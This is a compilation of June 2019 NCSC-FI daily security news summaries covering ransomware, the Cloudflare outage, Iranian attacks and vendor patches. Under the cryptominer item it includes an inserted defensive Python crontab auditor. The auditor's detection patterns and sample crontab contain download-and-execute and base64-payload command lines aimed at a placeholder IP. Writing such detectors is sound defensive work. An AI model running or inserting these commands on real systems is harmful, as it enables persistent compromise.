Categories
NCSC-FI News followup

Daily NCSC-FI news followup 2019-06-24

How to remove Ryuk Ransomware (Uninstall guide)

csirt.cy/how-to-remove-ryuk-ransomware-uninstall-guide/ Ryuk ransomware is a cryptovirus that targets companies with large ransom demands to make more profit from a single attack. However, the ransomware can also affect everyday users and corrupt or delete their data. A thorough system scan is needed to terminate the malware in time. According to the latest news reports, Ryuk ransomware is still spreading rapidly across the Internet and infecting users worldwide. The Federal Bureau of Investigation (FBI) has conducted research and found that this cyber threat has launched attacks on more than 100 different types of businesses in the United States of America.

Cloudflare is Having an Outage Affecting Sites Everywhere

www.bleepingcomputer.com/news/technology/cloudflare-is-having-an-outage-affecting-sites-everywhere/ Cloudflare is currently suffering an outage this morning that is affecting web sites around the world. This outage is not affecting all regions and only certain domains, including BleepingComputer, so some of you will be able to see this article and others won’t until the issue is resolved. According to Cloudflare, over 16 million Internet sites utilize their services for performance enhancement, DDoS mitigation, or other features. Because of this, an outage can have a large impact on the entire Internet. Cloudflare has opened an incident report for this outage titled “Route Leak Impacting Cloudflare”. See also: www.cloudflarestatus.com/incidents/46z55mdhg0t5,

www.theregister.co.uk/2019/06/24/cloudflare_route_leak/ and

isc.sans.edu/forums/diary/Extensive+BGP+Issues+Affecting+Cloudflare+and+possibly+others/25064/

Did you receive one of these files by e-mail? Be careful

www.is.fi/digitoday/tietoturva/art-2000006149767.html All unknown files arriving by e-mail should always be treated with caution. Security company Kaspersky Lab nevertheless urges extreme care with these four attachment types. File types: Zip and rar, Office, Pdf, and Iso and img.

Did you receive a suspicious e-mail from a popular service? This is what it is about

www.tivi.fi/uutiset/tv/5107ff91-0ffa-4116-a8a3-71b485068309 The travel app TripAdvisor is requiring some users to change their passwords. The measure applies to users whose login credentials have been found among data leaks that have become public.

Beware: this is how scammers strike at companies during the summer holiday season

www.yrittajat.fi/uutiset/609062-varo-nain-huijarit-iskevat-yrityksiin-kesalomakaudella Summer is a golden time for scammers, because many workplaces are staffed by temporary substitutes. Companies are targeted with e-mail scams, fake invoices and so-called CEO fraud.

The Modern-Day Heist: IP Theft Techniques That Enable Attackers

threatpost.com/ip-theft-enables-attackers/145912/ One of the more commonly exploited vectors used by attackers today is poorly secured third-party supply-chain vendors. Adversaries often take aim at organizations that have unfettered access to a multitude of customers, to get a foothold inside their primary target.

Microsoft: We’re fighting Windows malware spread via Excel in email with bad macro

www.zdnet.com/article/microsoft-were-fighting-windows-malware-spread-via-excel-in-email-with-bad-macro/ Don’t enable macros, Microsoft warns, because a new malware campaign is aiming at fully patched Windows PCs.

Anonymous hacker exposed after dropping USB drive while throwing Molotov cocktail

www.zdnet.com/article/anonymous-hacker-exposed-after-dropping-usb-drive-while-throwing-molotov-cocktail/ In a bizarre investigation, Belgium police have identified a member of the Anonymous Belgium hacker collective while investigating an arson case at a local bank. The perpetrator, a 35-year-old man from the Belgian city of Roeselare, was initially arrested after throwing a Molotov cocktail at the Crelan Bank office in Rumbeke, a suburb of Roeselare, back in 2014.

User data stolen from human hacking forum Social Engineered, published on rival site

www.zdnet.com/article/user-data-stolen-from-human-hacking-forum-social-engineered-published-on-rival-site/ A forum dedicated to the art of social engineering, Social Engineered, has been compromised and its users’ data leaked on a rival website. The data breach occurred on June 13, 2019. The details of the forum users, including 89,000 unique email addresses linked to 55,000 forum account holders, usernames, IP addresses, and passwords stored as salted MD5 hashes, were published and leaked online. See also:

www.bleepingcomputer.com/news/security/social-engineering-forum-hacked-data-shared-on-leak-sites/

Election Security

www.schneier.com/blog/archives/2019/06/election_securi_3.html Stanford University’s Cyber Policy Center has published a long report on the security of US elections. Summary: it’s not good.

Managing insider threats: context is critical

www.itproportal.com/features/managing-insider-threats-context-is-critical/ Insider threat is a complex risk to manage; context is required to separate malicious actors from careless employees. The topic of insider threat is fast rising up the corporate agenda. While you might think a company’s own employees would be less likely to pose security risks than external attackers, analysis by Computing has found that insider threat was a factor in half of reported breaches.

GandCrab Threat Actors Retire…Maybe

www.fortinet.com/blog/threat-research/gandcrab-threat-actors-retire.html GandCrab was a Ransomware-as-a-Service malware managed by a criminal organization known to be confident and vocal, while running a rapidly evolving ransomware campaign. Through their aggressive, albeit unusual, marketing strategies and constant recruitment of affiliates, they were able to globally distribute a high volume of their malware. However, through a recent forum post, the GandCrab team has now publicly announced the end of a little more than a year of ransomware operations, citing staggering profit figures. Considering how witty and novel this threat group has been throughout the course of their campaign, it wouldn’t be a surprise if this retirement announcement was just another of their many public stunts. If there’s one thing that sets these threat actors apart from other groups, it is that they are unpredictable; so there is always the possibility that they might re-surface in one form or another. In the meantime, FortiGuard Labs will continue to monitor for any new activities from this group.

The Return of the WiZard Vulnerability: Crooks Start Hitting

blog.yoroi.company/research/the-return-of-the-wizard-vulnerability-crooks-start-hitting/ In the past days, a really important issue has been disclosed to the public: the Return of the WiZard vulnerability (ref. EW N030619, CVE-2019-10149). The vulnerability affects a wide range of Exim servers, one of the main email server technologies, extremely widespread all around the globe and in Italy too.

Grim finding in the Chrome browser: it looks a lot like spyware

www.is.fi/digitoday/art-2000006152557.html Countless tracking programs watch you online. Many websites give advertising and data companies access to the user’s browsing history and location through cookie files installed on the computer. One browser, however, favours cookies more than the others. The world’s most popular web browser, Chrome, allows extensive tracking of the user by default. A Washington Post columnist reports on his findings after looking under Chrome’s hood. In just one week of use, Chrome served up more than 11,000 cookies intended for tracking. See also:

www.washingtonpost.com/technology/2019/06/21/google-chrome-has-become-surveillance-software-its-time-switch/

Antivirus products put to the test: a Finnish product earned praise

www.tivi.fi/uutiset/tv/cf5371c4-0655-40af-9e60-12a7341ec43d The German AV-Test ranked the most popular Windows 10 antivirus products on three main criteria: protection, performance and usability. Eight of the tested programs got full marks in every category. The tests were, however, conducted in a laboratory environment; in the real world various variables can change the results. Even if a program blocked 100 percent of the viruses in the test, it may not necessarily achieve the same at home.

Business Decision Makers Focus on the Wrong Security Issues

www.bleepingcomputer.com/news/security/business-decision-makers-focus-on-the-wrong-security-issues/ Individuals with security roles have a different opinion about the cloud threats organizations should be wary about and defend against than the more practical approaches actually seen in security incidents. The main worries among 1,250 decision makers on cloud-related security issues interviewed for a study commissioned by Symantec were data breaches and malware injection, yet statistical attack data tells a different story.


Daily NCSC-FI news followup 2019-06-23

U.S. Carried Out Cyberattacks on Iran

www.nytimes.com/2019/06/22/us/politics/us-iran-cyber-attacks.html United States Cyber Command on Thursday conducted online attacks against an Iranian intelligence group that American officials believe helped plan the attacks against oil tankers in recent weeks, according to people briefed on the operation. The intrusion occurred the same day President Trump called off a strike on Iranian targets like radar and missile batteries. But the online operation was allowed to go forward because it was intended to be below the threshold of armed conflict, using the same shadow tactics that Iran has deployed. The online attacks, which had been planned for several weeks, were ultimately meant to be a direct response to both the tanker attacks this month and the downing of an American drone this week, according to the people briefed on the operations. Multiple computer systems were targeted, according to people briefed on the operations, including those believed to have been used by an Iranian intelligence group that helped plan the tanker attacks. See also:

news.yahoo.com/pentagon-secretly-struck-back-against-iranian-cyber-spies-targeting-us-ships-234520824.html,

www.washingtonpost.com/world/national-security/with-trumps-approval-pentagon-launched-cyber-strikes-against-iran/2019/06/22/250d3740-950d-11e9-b570-6416efdc0803_story.html,

www.kauppalehti.fi/uutiset/washington-post-yhdysvallat-teki-kyberiskun-iranin-ohjusjarjestelmiin/10dd83a3-5f1a-4282-b1e7-06e0cdc29294, www.is.fi/ulkomaat/art-2000006151539.html,

www.hs.fi/ulkomaat/art-2000006151551.html,

www.kaleva.fi/uutiset/ulkomaat/mediatiedot-yhdysvallat-teki-kyberiskun-iranin-sotilastietojarjestelmiin/822392/ and

www.wsj.com/articles/u-s-launched-cyberattacks-on-iran-11561263454

DHS warns of spike in cyberattacks from Iran

www.washingtontimes.com/news/2019/jun/22/dhs-warns-spike-cyberattacks-iran/ Iranian computer hackers are ramping up attacks against U.S. targets, a top Department of Homeland Security official said Saturday. Christopher C. Krebs, the head of the DHS Cybersecurity and Infrastructure Security Agency, or CISA, issued a statement confirming recent reporting about Iranian hackers increasingly setting their sights on the U.S. as tensions flare between the countries. “CISA is aware of a recent rise in malicious cyber activity directed at United States industries and government agencies by Iranian regime actors and proxies,” said Mr. Krebs. “We will continue to work with our intelligence community and cybersecurity partners to monitor Iranian cyber activity, share information, and take steps to keep America and our allies safe,” he said. Iranian hackers are increasingly using wiper attacks to erase data stored on infected computers as opposed to just stealing it, Mr. Krebs added. These efforts are often enabled through common tactics like spear phishing, password spraying and credential stuffing. “What might start as an account compromise, where you think you might just lose data, can quickly become a situation where you’ve lost your whole network,” he warned. Individuals should defend themselves by exercising cybersecurity best practices and alert authorities of any suspected compromises, he said. CrowdStrike and FireEye, two private U.S. cybersecurity firms, both said Friday that they have witnessed an uptick in malicious activity in recent weeks traced to suspected Iranian government hackers. See also:

www.bloomberg.com/news/articles/2019-06-22/iran-increases-cyberattacks-on-the-u-s-amid-tensions-dhs-says,

www.bleepingcomputer.com/news/security/us-government-warns-of-data-wipers-used-in-iranian-cyberattacks/, https://twitter.com/CISAKrebs/status/1142520000135278594 and

www.zdnet.com/article/dhs-cisa-warns-of-iranian-hackers-habit-of-deploying-data-wiping-malware/. Tips: www.us-cert.gov/ncas/tips

Tor Browser 8.5.3 Fixes a Sandbox Escape Vulnerability in Firefox

www.bleepingcomputer.com/news/software/tor-browser-853-fixes-a-sandbox-escape-vulnerability-in-firefox/ Tor Browser 8.5.3 has been released to fix a sandbox escape vulnerability in Firefox that was recently used as part of a targeted attack against cryptocurrency companies. As this vulnerability is actively being exploited, it is strongly advised that all Tor users upgrade to the latest version. When starting Tor Browser, it should alert you if a new version is available. If you would like to perform a manual check, you can do so by going to Tor Browser menu -> Help -> About Tor Browser.


Daily NCSC-FI news followup 2019-06-22

NASA hacked because of unauthorized Raspberry Pi connected to its network

www.zdnet.com/article/nasa-hacked-because-of-unauthorized-raspberry-pi-connected-to-its-network/ A report published this week by the NASA Office of Inspector General reveals that in April 2018 hackers breached the agency’s network and stole approximately 500 MB of data related to Mars missions. The point of entry was a Raspberry Pi device that was connected to the IT network of the NASA Jet Propulsion Laboratory (JPL) without authorization or going through the proper security review.

WeTransfer Security Incident Sent Files to the Wrong People

www.bleepingcomputer.com/news/security/wetransfer-security-incident-sent-files-to-the-wrong-people/ In an embarrassing security incident, the WeTransfer file sharing service announced that for two days it was sending its users’ shared files to the wrong people. As this service is used to transfer what are considered private, and potentially sensitive, files, this could be a big privacy issue for affected users.

Data of 645k Oregonians exposed after nine DHS employees fell for a phishing attack

www.zdnet.com/article/data-of-645k-oregonians-exposed-after-nine-dhs-employees-fell-for-a-phishing-attack/ The personal information of over 645,000 Oregonians who signed up for benefits with the state’s Department of Human Services (DHS) was inadvertently exposed to hackers after nine DHS employees were fooled by phishing emails. The phishing attack happened on January 8, 2019, according to a news release from the Oregon DHS this week.

PoC Released for Outlook Flaw that Microsoft Patched 6 Months After Discovery

thehackernews.com/2019/06/microsoft-outlook-vulnerability.html As we reported two days ago, Microsoft this week released an updated version of its Outlook app for Android that patches a severe remote code execution vulnerability (CVE-2019-1105) that impacted over 100 million users. However, at that time, very few details of the flaw were available in the advisory, which just revealed that the earlier versions of the email app contained a cross-site scripting (XSS) flaw that could allow attackers to run scripts in the context of the current user just by sending a specially crafted email to the victims. Now, Bryan Appleby from F5 Networks, one of the security researchers who reported this issue independently to Microsoft, has released more details and a proof-of-concept for the Outlook vulnerability that he reported to the tech giant almost six months ago. See also:

www.f5.com/labs/articles/threat-intelligence/how-i-hacked-the-microsoft-outlook-android-app-and-found-cve-2019-1105


Daily NCSC-FI news followup 2019-06-21

Iranian Hackers Launch a New US-Targeted Campaign as Tensions Mount

www.wired.com/story/iran-hackers-us-phishing-tensions/ When two countries begin to threaten war in 2019, it’s a safe bet that they’ve already been hacking each other’s networks. Right on schedule, three different cybersecurity firms now say they’ve watched Iran’s hackers try to gain access to a wide array of US organizations over the past few weeks, just as military tensions between the two countries rise to a breaking point, though it’s not yet clear whether those hacker intrusions are aimed at intelligence gathering, laying the groundwork for a more disruptive cyberattack, or both.

Desjardins, Canada’s largest credit union, announces security breach

www.zdnet.com/article/desjardins-canadas-largest-credit-union-announces-security-breach/ Data for 2.9 million bank members was taken from the bank’s system by a now-fired employee.

Millions of Windows Dell PCs need patching: Give-me-admin security gremlin found lurking in bundled support tool

www.theregister.co.uk/2019/06/20/dell_supportassist_security_hole/ Dell’s troubleshooting software SupportAssist, bundled with the US tech titan’s home and business computers, has a security flaw that can be exploited by malware and rogue logged-in users to gain administrator powers. See also:

thehackernews.com/2019/06/dells-supportassist-hacking.html

Cybercriminals prey on holiday substitutes: it pays to invest in prevention

www.tivi.fi/uutiset/tv/0d6ce3a6-5640-47cb-97bb-cd4c52733f3f A company is at its most vulnerable to scams in the summer, because holiday substitutes are not necessarily familiar with all invoicing practices. The most common type of scam is the so-called Office 365 scam.

New devilish attack gets people to click and hand over their data: a highly effective scheme

www.is.fi/digitoday/tietoturva/art-2000006149749.html?ref=rss Scammers have lured people into clicking links using Google Calendar notifications.

Firefox 67.0.4 Released: Mozilla Patches Second 0-Day Flaw This Week

thehackernews.com/2019/06/firefox-0day-vulnerability.html Okay, folks, it’s time to update your Firefox web browser once again, yes, for the second time this week. See also:

threatpost.com/mozilla-fixes-second-actively-exploited-firefox-flaw/145893/

The city of Lahti is recovering from a cyberattack: the damage will still be repaired after Midsummer

yle.fi/uutiset/3-10837940 The city of Lahti has entered the recovery phase after last week’s cyberattack, the city’s IT department reports. Work to restore electronic services will continue at least into the week after Midsummer.

Chinese spies pose as talent recruiters and consultants on LinkedIn: a Finnish researcher’s publication describes how a target is hooked into handing over confidential information

www.hs.fi/ulkomaat/art-2000006150040.html Researcher Mika Aaltola describes in a new publication from the Finnish Institute of International Affairs how Chinese spies approach their targets on the networking service LinkedIn.

How to Remove the Chromium Virus

www.pandasecurity.com/mediacenter/malware/chromium-virus/ The Chromium virus is a malicious web browser that is created using the Chromium code. It is able to overwrite the Chrome browser and replace the original shortcuts with fake ones. It can change the default search engine on your browser so that you’re directed to fake sponsored search results, and it can also control your apps, themes and extensions.

Backdoor Built into Android Firmware

www.schneier.com/blog/archives/2019/06/backdoor_built_.html In 2017, some Android phones came with a backdoor pre-installed: Criminals in 2017 managed to get an advanced backdoor preinstalled on Android devices before they left the factories of manufacturers, Google researchers confirmed on Thursday.

New Bird Miner malware targets Mac pirates

www.zdnet.com/article/new-bird-miner-cryptocurrency-miner-targets-mac-pirates/ The malware emulates Linux in its quest for cryptocurrency. A new variant of cryptocurrency mining malware called Bird Miner designed for Apple Mac is targeting users of pirated software.

Steam Phishing Campaign Steals Credentials, Hijacks Accounts

www.bleepingcomputer.com/news/security/steam-phishing-campaign-steals-credentials-hijacks-accounts/ A new phishing campaign is doing the rounds on the Steam game distribution platform, attempting to trick people into handing over their credentials via a roulette-style game promising free keys. The fraudsters funnel the Steam users to the phishing websites with the help of a redirector domain which is hidden behind a URL shortened using t.co, Twitter’s link-shortening service. The phishing sites are promoted on the Steam platform using already hijacked accounts which deliver the shortened URLs to their friend list using the Steam chat.

New LooCipher Ransomware Spreads Its Evil Through Spam

www.bleepingcomputer.com/news/security/new-loocipher-ransomware-spreads-its-evil-through-spam/ A new ransomware called LooCipher has been discovered that is actively being used in the wild to infect users. While it is not known exactly how this ransomware is being distributed, based on some of the files that were found, we believe it is through a spam campaign.

BlueKeep Warnings Pay Off, Boost Patching in Enterprise Networks

www.bleepingcomputer.com/news/security/bluekeep-warnings-pay-off-boost-patching-in-enterprise-networks/ The multiple warnings about patching Windows systems against the BlueKeep vulnerability (CVE-2019-0708) have not gone unheeded. Administrators of enterprise networks listened and updated most of the machines affected by the issue.

Microsoft Warns of Campaign Dropping Flawedammyy RAT in Memory

www.bleepingcomputer.com/news/security/microsoft-warns-of-campaign-dropping-flawedammyy-rat-in-memory/ Microsoft issued a warning about an active spam campaign that tries to infect Korean targets with the FlawedAmmyy RAT malware distributed via malicious XLS attachments. The Microsoft Security Intelligence Twitter account explained in a thread that a currently active campaign “employs a complex infection chain to download and run the notorious FlawedAmmyy RAT directly in memory.” Attacks start after the victims open the attached .xls file that “automatically runs a macro function that runs msiexec.exe, which in turn downloads an MSI archive. The MSI archive contains a digitally signed executable that is extracted and run, and that decrypts and runs another executable in memory.”

Sodinokibi Ransomware Spreads Wide via Hacked MSPs, Sites, and Spam

www.bleepingcomputer.com/news/security/sodinokibi-ransomware-spreads-wide-via-hacked-msps-sites-and-spam/ With the GandCrab Ransomware operation shutting down, affiliates are looking to fill the hole left behind with other ransomware. Such is the case with the Sodinokibi Ransomware, whose affiliates are using a wide range of tactics to distribute the ransomware and earn a commission.

This botnet exploits Android Debug Bridge to mine cryptocurrency on your device

www.zdnet.com/article/this-botnet-spreads-through-ssh-to-mine-for-cryptocurrency/ A new botnet is making the rounds by abusing Android Debug Bridge (ADB) and SSH to enslave new Android devices to its network.

OpenSSH gets protection against attacks like Spectre, Meltdown, Rowhammer, and Rambleed

www.zdnet.com/article/openssh-gets-protection-against-attacks-like-spectre-meltdown-rowhammer-and-rambleed/ The OpenSSH project is getting protection against side-channel attacks that are known to leak data from a computer’s memory, and allow malicious threat actors to steal sensitive information.

Free proxy service found running on top of 2,600+ hacked WordPress sites

www.zdnet.com/article/free-proxy-service-found-running-on-top-of-2600-hacked-wordpress-sites/ A website offering both free and commercial proxy servers is actually running on top of a giant botnet of hacked WordPress sites, security researchers from Netlab, a network threat hunting unit of Chinese cyber-security giant Qihoo 360, have revealed. In a report published today, Netlab researchers accused the Free-Socks.in proxy service of masquerading as a front for a criminal operation. Researchers said that users who would use any of the proxy servers provided by the Free-Socks.in website would actually have their traffic funneled through a network of hacked WordPress sites spread all over the world.

Microsoft Outlook for Android Open to XSS Attacks

threatpost.com/microsoft-outlook-android-xss/145924/ A spoofing bug (CVE-2019-1105) can open the door to an email attack chain. Microsoft has patched a vulnerability in Microsoft Outlook for Android, which opens the door to cross-site scripting (XSS) attacks. The software giant said that CVE-2019-1105, rated important, is a spoofing vulnerability that exists in the way Microsoft Outlook for Android software parses specifically crafted email messages.

CVE-2019-8635: Double Free Vulnerability in Apple macOS Lets Attackers Escalate System Privileges and Execute Arbitrary Code

blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-8635-double-free-vulnerability-in-apple-macos-lets-attackers-escalate-system-privileges-and-execute-arbitrary-code/ We discovered a double free vulnerability (assigned as CVE-2019-8635) in macOS. The vulnerability is caused by a memory corruption flaw in the AMD component. If successfully exploited, an attacker can implement privilege escalation and execute malicious code on the system with root privileges. We disclosed our findings to Apple, which has since released a patch. See also:

support.apple.com/en-us/HT210119

Beware! Playing Untrusted Videos On VLC Player Could Hack Your Computer

thehackernews.com/2019/06/vlc-media-player-hacking.html If you use VLC media player on your computer and haven’t updated it recently, don’t you even dare to play any untrusted, randomly downloaded video file on it.


Daily NCSC-FI news followup 2019-06-20

Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments

www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments Waterbug may have hijacked a separate espionage group’s infrastructure during one attack against a Middle Eastern target. The Waterbug espionage group (aka Turla) has continued to attack governments and international organizations over the past eighteen months in a series of campaigns that have featured a rapidly evolving toolset and, in one notable instance, the apparent hijacking of another espionage group’s infrastructure.

DanaBot Banking Trojan Upgraded with ‘Non Ransomware’ Module

www.bleepingcomputer.com/news/security/danabot-banking-trojan-upgraded-with-non-ransomware-module/ A new malicious campaign is distributing an upgraded variant of DanaBot that comes with a new ransomware module, used to target potential victims in Italy and Poland via phishing emails which deliver malware droppers. As initially discovered by Proofpoint researchers in May 2018, DanaBot is a modular banking Trojan developed in Delphi and designed to steal banking credentials and sensitive information by collecting form data, taking screenshots, or logging keystrokes on compromised computers. See also:

research.checkpoint.com/danabot-demands-a-ransom-payment/ and

threatpost.com/danabot-ransomware-arsenal/145863/

Firefox zero-day was used in attack against Coinbase employees, not its users

www.zdnet.com/article/firefox-zero-day-was-used-in-attack-against-coinbase-employees-not-its-users/ There were actually two zero-days — not one — combined into an exploit used in a spear-phishing attempt. Other cryptocurrency organizations were also targeted. A recent Firefox zero-day that has made headlines across the tech news world this week was actually used in attacks against Coinbase employees, and not the company’s users, ZDNet has learned. See also:

www.zdnet.com/article/firefox-zero-day-was-used-in-attack-against-coinbase-employees-not-its-users/,

www.bleepingcomputer.com/news/security/mozilla-firefox-6704-fixes-second-actively-exploited-zero-day/ and

www.bleepingcomputer.com/news/security/firefox-0-day-used-in-targeted-attacks-against-cryptocurrency-firms/

Cryptocurrency Mining Botnet Arrives Through ADB and Spreads Through SSH

blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-mining-botnet-arrives-through-adb-and-spreads-through-ssh/ We observed a new cryptocurrency mining botnet that arrives via open ADB (Android Debug Bridge) ports and can spread via SSH. This attack takes advantage of the way open ADB ports don’t have authentication by default, similar to the Satori botnet variant we previously reported. This botnet’s design allows it to spread from the infected host to any system that has had a previous SSH connection with the host. The use of ADB makes Android-based devices susceptible to the malware. We detected activity from this botnet in 21 different countries, with the highest percentage found in South Korea.

Cisco critical-flaw warning: These two bugs in our data-center gear need patching now

www.zdnet.com/article/cisco-critical-flaw-warning-these-two-bugs-in-our-data-center-gear-need-patching-now/ Cisco is warning enterprise admins to install security updates for two critical flaws. Networking giant Cisco has disclosed two critical vulnerabilities affecting core equipment in the data center that could give determined attackers an avenue to break into networks. Cisco’s Digital Network Architecture (DNA) Center appliance has once again been found to be vulnerable to an authentication bypass, which could allow an “adjacent” attacker to skip authentication and cause damage to an organization’s critical internal services. The flaw, tagged as CVE-2019-1848, is because Cisco didn’t sufficiently restrict access to ports used to operate the system. The vulnerability would allow an attacker to connect an unauthorized device to the network. See also:

tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-dnac-bypass and threatpost.com/cisco-dna-center-critical-flaw/145849/

Google takes the PIS out of advertising: New algo securely analyzes shared encrypted data sets without leaking contents

www.theregister.co.uk/2019/06/19/google_pis_encryption/ Google on Wednesday released source code for a project called Private Join and Compute that allows two parties to analyze and compare shared sets of data without revealing the contents of each set to the other party. This is useful if you want to see how your private encrypted data set of, say, ad-clicks-to-sales conversion rates, correlates to someone else’s encrypted conversion rate data set without disclosing the actual numbers to either side. This particular technique is a type of secure multiparty computation that builds upon a cryptographic protocol called Private Set-Intersection (PSI). Google employs this approach in a Chrome extension called Password Checkup that lets users test logins and passwords against a dataset of compromised credentials without revealing the query to the internet goliath. See also

threatpost.com/google-computational-privacy/145835/ and

www.theregister.co.uk/2019/06/19/google_pis_encryption/

Samba Vulnerability Can Crash Active Directory Components

www.bleepingcomputer.com/news/security/samba-vulnerability-can-crash-active-directory-components/ A couple of bugs in some versions of Samba software can help an attacker crash key processes on the network in charge of accessing directory, application, and server services. The two vulnerabilities can be leveraged separately to crash the LDAP (Lightweight Directory Access Protocol) and the RPC (remote procedure call) server processes in the Samba Active Directory Domain Controller, supported since version 4.0 of the software.

The U.S. Loses Over $1.5 Trillion in a Decade of Data Breaches

www.bleepingcomputer.com/news/security/the-us-loses-over-15-trillion-in-a-decade-of-data-breaches/ A decade’s collection of data breaches shows a bleak picture, with billions of records exposed in this type of incident and financial damages of more than $1.6 trillion. Data collected from public sources reveal that since 2008 there were close to 9,700 breach events in the U.S., involving more than 10.7 billion records, with an average cost calculated in 2018 at $148 per record.

ISC Releases BIND Security Updates

www.us-cert.gov/ncas/current-activity/2019/06/19/ISC-Releases-BIND-Security-Updates The Internet Systems Consortium (ISC) has released updates that address a vulnerability in versions of ISC Berkeley Internet Name Domain (BIND). A remote attacker could exploit this vulnerability to cause a denial-of-service condition. The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the ISC advisory for CVE-2019-6471 and apply the necessary updates.

Check Point’s Threat Emulation Stops Large-Scale Phishing Campaign in Germany

blog.checkpoint.com/2019/06/19/sandblast-agent-phishing-germany-campaign-security-hack-ransomware/ During the first week of June 2019, Check Point researchers encountered a new, large-scale phishing campaign targeting German companies across all industries. The hackers’ goal was to install Remcos, a remote control tool, on the victims’ computers. The attackers initially sent fake emails that appeared to be from several legitimate companies across Germany. These emails contained invoices or urgent order attachments which were actually Remcos archives attempting to connect with the attackers’ command and control (C&C) server. See also:

forensics.checkpoint.com/remcos_te/ThreatEmulationReport.html and forensics.checkpoint.com/remcos/index.html

Modular Plurox Malware Is a Wormable Backdoor Cryptominer

www.bleepingcomputer.com/news/security/modular-plurox-malware-is-a-wormable-backdoor-cryptominer/ A new modular backdoor malware strain capable of mining cryptocurrencies and of spreading to other machines on the local network with the help of SMB and UPnP plugins has been detected by Kaspersky security researchers. The backdoor malware named Plurox was discovered in February and it seems to be still in its testing phase, given that its source code and the communication channels it uses to contact its command-and-control (C&C) server are not yet encrypted in any way. See also:

securelist.com/plurox-modular-backdoor/91213/

Feds: Cyberattack on NASA’s JPL Threatened Mission-Control Data

threatpost.com/feds-hackers-mission-control-data-nasa-jpl/145842/ Rampant security-operations bungling allowed cyberattackers to infiltrate JPL’s network, which carries human mission data. NASA’s Jet Propulsion Laboratory (JPL) may know how to send delicate equipment to Mars, but basic cybersecurity best practices appear to pose an issue for it. A comprehensive federal review has detailed an April 2018 security incident that compromised mission systems, stemming from multiple IT security-control weaknesses exposing NASA systems and data. The review, released Tuesday and carried out by the U.S. Office of the Inspector General, said that the weaknesses reduce JPL’s ability to prevent, detect and mitigate attacks targeting its systems and networks. Specifically, poor practices when it comes to network segmentation and third parties were the source of a cyberattack in April 2018, OIG said. See also oig.nasa.gov/docs/IG-19-022.pdf

Cryptominer Uses Cron To Reinfect Linux Host After Removal

www.bleepingcomputer.com/news/security/cryptominer-uses-cron-to-reinfect-linux-host-after-removal/ A cryptomining dropper malware has been spotted by security researchers gaining persistence on Linux hosts by adding cron jobs that reinfect the compromised machines after the miner is removed. The malware was initially discovered on a web server whose CPU was maxed out by a malicious process, a sure sign of a host infected with cryptomining malware configured to use all available computing resources. As Sucuri’s security analyst Luke Leal found after taking a closer look, the cryptominer is downloaded by attackers using a Bash script dropped on the server via an unknown method, most probably after exploiting an unpatched vulnerability, brute forcing their way in, or phishing the admin credentials. See also:

blog.sucuri.net/2019/06/cryptomining-dropper-and-cronjob-creator.html
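The defensive check this item calls for is a crontab audit: killing the miner is useless while a cron entry re-plants it. Below is an added example (not Sucuri's or BleepingComputer's code) that parses crontab text and flags entries matching the reinfection pattern described above: download-and-execute pipelines, base64-decoded payloads, jobs run from scratch directories, and every-minute schedules. The sample crontab is constructed for the example (198.51.100.23 is a documentation address, not a real server), and the indicator list is a heuristic starting point to tune locally, not a complete signature.

```python
"""Audit user crontab text for entries typical of dropper/reinfection jobs.

Added example, not Sucuri's or BleepingComputer's code. The indicator list
is a heuristic starting point; the sample crontab below is constructed and
198.51.100.23 is a documentation address (TEST-NET-2), not a real C2 host.
Feed it the output of `crontab -l` or the files under /etc/cron.d.
"""
import re

# (label, regex) pairs matched against the command part of each entry.
INDICATORS = [
    ("download-and-execute",
     re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")),
    ("base64 decode",
     re.compile(r"\bbase64\s+(-d|--decode)\b")),
    ("runs from scratch dir",
     re.compile(r"(?<![\w.])/(?:tmp|dev/shm|var/tmp)/")),
]
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


def parse_crontab(text):
    """Yield (schedule, command) pairs from crontab text, skipping comments,
    blank lines and VAR=value assignments. Handles @reboot-style aliases."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue
        if line.startswith("@"):
            parts = line.split(None, 1)            # @reboot <command>
        else:
            parts = line.split(None, 5)            # m h dom mon dow <command>
            if len(parts) == 6:
                parts = [" ".join(parts[:5]), parts[5]]
        if len(parts) == 2:
            yield parts[0], parts[1]


def audit_crontab(text):
    """Return a list of suspicious entries with the indicators each tripped."""
    findings = []
    for schedule, command in parse_crontab(text):
        hits = [label for label, rx in INDICATORS if rx.search(command)]
        # A job that fires every minute is how a dropper re-plants itself
        # seconds after an admin kills the miner. Flag it only when it also
        # matched a content indicator, to keep benign every-minute jobs out.
        if hits and schedule == "* * * * *":
            hits.append("every-minute schedule")
        if hits:
            findings.append({"schedule": schedule, "command": command,
                             "indicators": hits})
    return findings


# Constructed sample: one benign job and three that should be flagged.
SAMPLE_CRONTAB = """\
# Constructed sample crontab for this example (not a real infection)
PATH=/usr/local/bin:/usr/bin:/bin
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -fsSL http://198.51.100.23/update.sh | sh
* * * * * /tmp/.x/run.sh > /dev/null 2>&1
@reboot echo aGVsbG8= | base64 -d > /dev/shm/.s && sh /dev/shm/.s
"""

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"[{', '.join(f['indicators'])}] {f['schedule']} {f['command']}")
```

Run it against every user's crontab and the system cron directories, not just root's; the article's dropper was delivered as a Bash script, and a web-server account is as good a place for a cron job as any.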

Oracle issues emergency update to patch actively exploited WebLogic flaw

arstechnica.com/information-technology/2019/06/oracle-issues-emergency-update-to-patch-actively-exploited-weblogic-flaw/ Oracle on Tuesday published an out-of-band update patching a critical code-execution vulnerability in its WebLogic server after researchers warned that the flaw was being actively exploited in the wild. The vulnerability, tracked as CVE-2019-2729, allows an attacker to run malicious code on the WebLogic server without any need for authentication. That capability earned the vulnerability a Common Vulnerability Scoring System score of 9.8 out of 10. The vulnerability is a deserialization attack targeting two Web applications that WebLogic appears to expose to the Internet by default: wls9_async_response and wls-wsat.war. The flaw in Oracle’s WebLogic Java application servers came to light as a zero-day four days ago when it was reported by security firm KnownSec404. See also:

blog.yoroi.company/warning/nuova-vulnerabilita-in-oracle-weblogic/

